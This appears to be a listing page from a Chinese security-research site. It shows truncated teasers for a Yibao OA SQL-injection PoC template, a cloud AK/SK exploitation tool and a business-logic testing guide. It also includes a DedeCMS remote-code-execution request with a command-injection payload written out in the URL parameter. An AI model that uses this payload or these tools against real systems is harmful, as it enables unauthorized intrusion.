最新发布第6页
排序
【通用】易宝OA GetUDEFStreamID Sql注入
fofa语句yakit插件 uuidpocyakit yamlnuclei yamlid: yibao_OA-GetUDEFStreamID-sqli info: name: 易宝OA-GetUDEFStreamID-SQL注入 author: dreamer292 from 秃兔安全_tutusec.com severity: hi...
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞
GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
☁️ AKSK & OSS 存储桶控管综合利用 – 云资产管理工具
⚠️ 免责申明cloudTools 仅供安全专业人员学习和练习云安全技术!⚠️ 此工具提供的功能仅用于网络安全人员检测、维护自己负责的网站、服务器等目标(包括但不限于)。未经授权,请勿使用工具...
【渗透文库】信息修改场景业务逻辑测试
测试描述:通过抓包工具分析信息修改场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:涉及客户信息修改和金融交易修改的业务场景 测试工...
攻防演练 & 红蓝对抗 & 其他文库











